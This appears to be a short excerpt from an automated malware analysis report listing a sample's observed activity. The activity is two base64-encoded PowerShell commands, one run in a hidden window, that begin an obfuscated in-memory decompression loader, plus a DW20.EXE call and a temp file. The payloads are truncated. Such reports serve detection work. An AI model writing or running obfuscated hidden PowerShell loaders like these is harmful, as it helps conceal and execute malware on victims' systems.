Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4AZQB3AC0AbwBiAEoARQBDAFQAIABJAE8ALgBDAG8ATQBQAHIARQBzAHMAaQBPAG4ALgBEAGUARgBsAGEAdABlAHMAVABSAEUAYQBNACgAIABbAHMAWQBzAHQAZQBtAC4AaQBvAC4AbQBlAE0AbwByAHkAcwBUAFIARQBBAG0AXQAgAFsAUwBZAF...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\938096.cvr
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e IAAoAG4AZQB3AC0AbwBiAEoARQBDAFQAIABJAE8ALgBDAG8ATQBQAHIARQBzAHMAaQBPAG4ALgBEAGUARgBsAGEAdABlAHMAVABSAEUAYQBNACgAIABbAHMAWQBzAHQAZQBtAC4AaQBvAC4AbQBlAE0AbwByAHkAcwBUAFIARQBBAG0AXQAgAFsAUwBZAF...' (with a hidden window)